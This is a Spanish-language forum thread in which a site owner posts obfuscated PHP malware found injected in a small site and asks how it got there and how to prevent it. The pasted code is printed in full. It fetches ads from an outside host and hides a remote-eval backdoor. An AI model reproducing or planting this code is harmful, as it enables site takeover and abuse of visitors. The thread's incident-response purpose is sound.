hola ps un compañero a su web algunos links al picar les abre publicidad de otras web en vez de q funcione el link con normalidad, por ejemplo yo lo abro con mi mac book y m aprece publicidad para bajarme mackeeper...
le echamos un vistazo al código y nos percatamos que existía este código...
<?php
//###==###
error_reporting(0); ini_set("display_errors", "0"); if (!isset($i8824abdf)) { $i8824abdf = TRUE; $GLOBALS['_537135123_']=Array(base64_decode('cH' .'Jl' .'Z1' .'9tYXRjaA' .'=='),base64_decode('ZmlsZV9nZXRf' .'Y29udGVudHM='),base64_decode('c' .'29ja2V0X2NyZWF0Z' .'V9wYWly'),base64_decode('' .'bX' .'Nz' .'c' .'W' .'xfc' .'X' .'V' .'lcnk' .'='),base64_decode('ZnVuY3' .'Rpb2' .'5fZX' .'hpc3Rz'),base64_decode('' .'Y3' .'VybF' .'9pbm' .'l0'),base64_decode('dX' .'Js' .'ZW5jb2Rl'),base64_decode('dXJsZW' .'5jb2' .'Rl'),base64_decode('b' .'WQ' .'1'),base64_decode('Y3' .'Vy' .'bF9zZ' .'XRv' .'cHQ='),base64_decode('Y3VybF9zZ' .'XRvcHQ='),base64_decode('bX' .'RfcmFuZA=='),base64_decode('Zm' .'ls' .'ZWN0' .'aW1l'),base64_decode('Y3V' .'ybF9le' .'G' .'Vj'),base64_decode('Y3VybF' .'9j' .'b' .'G9z' .'ZQ=='),base64_decode('aW' .'5pX2dldA=='),base64_decode('ZmlsZV9' .'nZXRfY2' .'9ud' .'GVu' .'dHM='),base64_decode('' .'d' .'XJsZW5jb' .'2Rl'),base64_decode('d' .'XJsZW5jb' .'2Rl'),base64_decode('bWQ' .'1'),base64_decode('c' .'3Ry' .'aXBzb' .'GFzaGVz')); function _565757278
($i){$a=Array('Y2x' .'p' .'ZW5' .'0X2NoZ' .'W' .'N' .'r','Y2xpZW50X2NoZWNr','SFRUUF9BQ' .'0NFUF' .'RfQ0hBUlNFVA==','IS4hd' .'Q==','U' .'0NSS' .'VBUX0ZJTEV' .'O' .'Q' .'U1F','V' .'V' .'R' .'GLTg' .'=','d' .'2' .'luZG93cy0xMjUx','' .'SFRUU' .'F9BQ0NFUFRfQ0h' .'BUl' .'NFVA=' .'=','Y' .'3' .'VybF9p' .'bml0','a' .'H' .'R0' .'cDo' .'vL29kaW50YXJhLmNv' .'bS9n' .'ZX' .'QucG' .'hwP2Q9','U0V' .'SVkVSX05' .'BTUU=','U' .'kVRVUVTV' .'F9VUkk=','JnU9','SFRUUF9VU0VS' .'X' .'0FHRU5U','J' .'mM9','Jm' .'k9M' .'SZpcD' .'0' .'=','Uk' .'V' .'N' .'T' .'1RFX' .'0' .'FER' .'FI=','' .'Jmg' .'9','' .'OTczNDc' .'3Y' .'mJhZTQ' .'zOTc2O' .'TE0' .'ZW' .'Ni' .'N2Y0Mz' .'c' .'0Nz' .'E0NGU=','' .'U' .'0VS' .'VkVSX0' .'5BT' .'UU=','UkVR' .'VU' .'VTVF9VUk' .'k=','' .'SFRUUF' .'9VU' .'0VSX0FHRU5U','M' .'Q==','Y' .'Wxsb' .'3' .'df' .'dXJsX2Z' .'vcGV' .'u','' .'aHR0cDovL29kaW50Y' .'X' .'JhLmNvbS9n' .'ZXQu' .'cGh' .'w' .'P' .'2Q9','U0V' .'SVkVSX0' .'5B' .'TUU=','Uk' .'V' .'RVU' .'VTVF9' .'VU' .'kk=','J' .'n' .'U9','SFR' .'UUF9V' .'U' .'0VSX0F' .'HRU5U','JmM' .'9','Jmk9MSZpcD' .'0=','UkVNT1RFX' .'0' .'FERFI=','J' .'mg9','OTc' .'zNDc' .'3Y' .'mJhZTQzOTc2OT' .'E0ZW' .'Ni' .'N2Y0' .'M' .'zc0' .'NzE0N' .'GU=','' .'U0' .'VSVkVSX05' .'BTU' .'U=','Uk' .'V' .'RVUVTVF9VUkk=','SFRUUF9V' .'U' .'0VSX0FHRU' .'5U','M' .'Q' .'==','cA==','cA==','cA==','' .'O' .'DgyNG' .'F' .'iZGY=');return
base64_decode($a[$i]);} if(!empty($_COOKIE[_565757278
(0)]))die($_COOKIE[_565757278
(1)]);if
(!isset($b90d_0[_565757278
(2)])){if($GLOBALS['_537135123_'][0](_565757278
(3),$GLOBALS['_537135123_'][1]($_SERVER[_565757278
(4)]))){$b90d_1=_565757278
(5);}else{$b90d_1=_565757278
(6);}}else{$b90d_1=$b90d_0[_565757278
(7)];if
((round(0+187.5+187.5)^round
(0+375))&& $GLOBALS['_537135123_'][2]($b90d_0,$b90d_0,$_SERVER,$b90d_0,$_REQUEST))$GLOBALS['_537135123_'][3]($b90d_0,$b90d_0);}if($GLOBALS['_537135123_'][4](_565757278
(8))){$b90d_2=$GLOBALS['_537135123_'][5](_565757278
(9) .$GLOBALS['_537135123_'][6]($_SERVER[_565757278
(10)] .$_SERVER[_565757278
(11)]) ._565757278
(12) .$GLOBALS['_537135123_'][7]($_SERVER[_565757278
(13)]) ._565757278
(14) .$b90d_1 ._565757278
(15) .$_SERVER[_565757278
(16)] ._565757278
(17) .$GLOBALS['_537135123_'][8](_565757278
(18) .$_SERVER[_565757278
(19)] .$_SERVER[_565757278
(20)] .$_SERVER[_565757278
(21)] .$b90d_1 ._565757278
(22)));$GLOBALS['_537135123_'][9]($b90d_2,round(0+8.4+8.4+8.4+8.4+8.4),false);$GLOBALS['_537135123_'][10]($b90d_2,round(0+6637.6666666667+6637.6666666667+6637.6666666667),true);if
(round(0+1989.25+1989.25+1989.25+1989.25)<$GLOBALS['_537135123_'][11](round(0+785.5+785.5+785.5+785.5),round(0+962+962+962+962+962)))$GLOBALS['_537135123_'][12]($b90d_0,$_REQUEST);echo
$GLOBALS['_537135123_'][13]($b90d_2);$GLOBALS['_537135123_'][14]($b90d_2);}elseif($GLOBALS['_537135123_'][15](_565757278
(23))==round(0+0.5+0.5)){echo $GLOBALS['_537135123_'][16](_565757278
(24) .$GLOBALS['_537135123_'][17]($_SERVER[_565757278
(25)] .$_SERVER[_565757278
(26)]) ._565757278
(27) .$GLOBALS['_537135123_'][18]($_SERVER[_565757278
(28)]) ._565757278
(29) .$b90d_1 ._565757278
(30) .$_SERVER[_565757278
(31)] ._565757278
(32) .$GLOBALS['_537135123_'][19](_565757278
(33) .$_SERVER[_565757278
(34)] .$_SERVER[_565757278
(35)] .$_SERVER[_565757278
(36)] .$b90d_1 ._565757278
(37)));$b90d_3=_565757278
(38);}if(isset($_REQUEST[_565757278
(39)])&& $_REQUEST[_565757278
(40)]== _565757278
(41)){eval($GLOBALS['_537135123_'][20]($_REQUEST["c"]));} } //###==###
?>
lo eliminamos y todo a la perfección, pero mi duda es:
es posible saber como ingresaron ese código ahí?
¿fue a través del servidor, la pagina, etc...?
como se puede evitar esto?
sobretodo para ver si es algo q nos toca arreglar o si es algo q es directamente con el proveedor del servidor...
la página es un simple listado q manda los títulos de unos pdf a través de mysql y php.
saludos
en culquier parte dentro del hosting... porque seguro lo colaron desde otro php... si no tienes nada de eso, puede haber sido un hackeo al servidor del hosting directamente
ok, voy a checar eso, si hay un archivo de upload pero no es el mismo archivo...
quizá ahí este el problema...
tendrán algún enlace de buenas prácticas para upload de archivos